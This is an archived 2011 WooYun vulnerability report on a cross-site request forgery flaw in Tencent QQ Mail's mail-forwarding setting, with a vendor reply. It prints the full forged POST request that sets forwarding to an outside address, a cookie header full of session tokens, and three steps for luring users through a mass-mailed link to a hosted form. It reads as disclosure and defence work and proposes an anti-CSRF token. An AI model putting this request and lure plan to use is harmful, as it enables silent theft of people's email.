漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02089
漏洞标题:腾讯邮箱CSRF漏洞
相关厂商:腾讯
漏洞作者: Joey Yin
提交时间:2011-05-09 16:38
修复时间:2011-06-08 18:00
公开时间:2011-06-08 18:00
漏洞类型:CSRF
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-05-09: 细节已通知厂商并且等待厂商处理中
2011-05-09: 厂商已经确认,细节仅向厂商公开
2011-05-19: 细节向核心白帽子及相关领域专家公开
2011-05-29: 细节向普通白帽子公开
2011-06-08: 细节向实习白帽子公开
2011-06-08: 细节向公众公开
简要描述:
跟网易邮箱一个问题。
http://www.wooyun.org/bugs/wooyun-2010-02088
详细说明:
腾讯邮箱设置转发HTTP包:
POST /cgi-bin/setting1?sid=eP6_czyZRqFmXFwR HTTP/1.1
Host: m84.mail.qq.com
Referer: http://m84.mail.qq.com/cgi-bin/setting1?sid=eP6_czyZRqFmXFwR&fun=list&loc=frame_html,,,3
Content-Length: 1022
Cache-Control: max-age=0
Origin: http://m84.mail.qq.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: 0.9999804222024977; pgv_flv=10.0 r22; pgv_r_cookie=1062162612608; ptcz=e521607bd7c8b2197b213e81032fbadfb27d055fe0dd77108ed16d4b0851793a; pvid=9633133315; adid=15159174; o_cookie=15159174; pt2gguin=o0015159174; uin=o0015159174; skey=@uQdcppmMJ; ptisp=; new_mail_num=15159174&5; new_mail_num_15159174=5; pgv_pvid=4829073595; pgv_info=ssid=s7231264448; qm_authimgs_id=0; qm_verifyimagesession=h0034852b3d81ba75f45f3197457d17fe558f3ac2ea1f7afcf3b4762555592ee25ab73cb6794ab0e4c6; autologin=EXPIRED; qm_flag=0; qqmail_alias=aenjoy@qq.com; sid=15159174&10e7d7b5a708bcb16412079967a2ceb2,ckPiFSOeoeww.; sid_15159174=10e7d7b5a708bcb16412079967a2ceb2,ckPiFSOeoeww.; qm_sid=10e7d7b5a708bcb16412079967a2ceb2,ckPiFSOeoeww.; qm_username=15159174; qm_domain=http://m84.mail.qq.com; qm_qz_key=1_c8447911320d03fe9e003208f3641e7e010a08030f070d050600; CCSHOW=15159174&0000; CCSHOW_15159174=0000; foxacc=15159174&0; foxacc_15159174=0; ssl_edition=m84.mail.qq.com; edition=m84.mail.qq.com; username=15159174&15159174; username_15159174=15159174; tinfo=1304929645.1452*; device=iPad; qm_ftn_key=5c5f9e6b; qm_sk=15159174&ii7T7fN7; qm_sk_15159174=ii7T7fN7; qm_ssum=15159174&721ee677518d84094e73ac845bbe5e40; qm_ssum_15159174=721ee677518d84094e73ac845bbe5e40
sid=eP6_czyZRqFmXFwR&Fun=submit&signature=%3Cbr%3E&autocontent__html=%3Cdiv%3E%D5%E2%CA%C7%C0%B4%D7%D4QQ%D3%CA%CF%E4%B5%C4%BC%D9%C6%DA%D7%D4%B6%AF%BB%D8%B8%B4%D3%CA%BC%FE%A1%A3%3C%2Fdiv%3E%0D%0A%3Cdiv%3E%26nbsp%3B%3C%2Fdiv%3E%0D%0A%3Cdiv%3E%C4%FA%BA%C3%A3%AC%CE%D2%D7%EE%BD%FC%D5%FD%D4%DA%D0%DD%BC%D9%D6%D0%A3%AC%CE%DE%B7%A8%C7%D7%D7%D4%BB%D8%B8%B4%C4%FA%B5%C4%D3%CA%BC%FE%A1%A3%CE%D2%BD%AB%D4%DA%BC%D9%C6%DA%BD%E1%CA%F8%BA%F3%A3%AC%BE%A1%BF%EC%B8%F8%C4%FA%BB%D8%B8%B4%A1%A3%3C%2Fdiv%3E&addhtml=yes&rtcheck=0&verifykey=&verifycode=&verifycode_cn=&showcount=2&defaultfontid=0&defaultsizeid=0&defaultcolor=default&listmode=3&delflag=0&selectSign=-1&wapsigncontent__txt=%B8%C3%D3%CA%BC%FE%B4%D3%D2%C6%B6%AF%C9%E8%B1%B8%B7%A2%CB%CD%0D%0A&noinclude=0&titlePrefix=1&autofwd=2&fwdaddress=aaa%40aaa.cc&fwdbackup=0&replytype=0&abstract=0&mailsize=0&weather=0&Birthday=1&todaynews=1&editor=0&addrhistory=1&txtformat=0&IsValid=0&IsWapValid=0&atcpsubject=0&autoaddaddress=0&savesendbox=0&sendmailunicode=1&QQlight=0&qqplus=0&plpopen=1
同样没有做anti-csrf处理。只是要求提交session id以便验证。
漏洞证明:
攻击方式:
1. 在第三方站点制作一个页面,构造post表单。最关键的sid信息可从http referer中读出。
2. 群发邮件,内含该恶意url. 标题很吸引人那种。
3. 等着收邮件吧。
修复方案:
大家怎么都这么懒呢,一个anti-csrf token其实不费事的。分布式应用里面不能用stick session但是也可以用distributed cache啊。
版权声明:转载请注明来源 Joey Yin@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:2
确认时间:2011-05-09 19:37
厂商回复:
thanks
最新状态:
暂无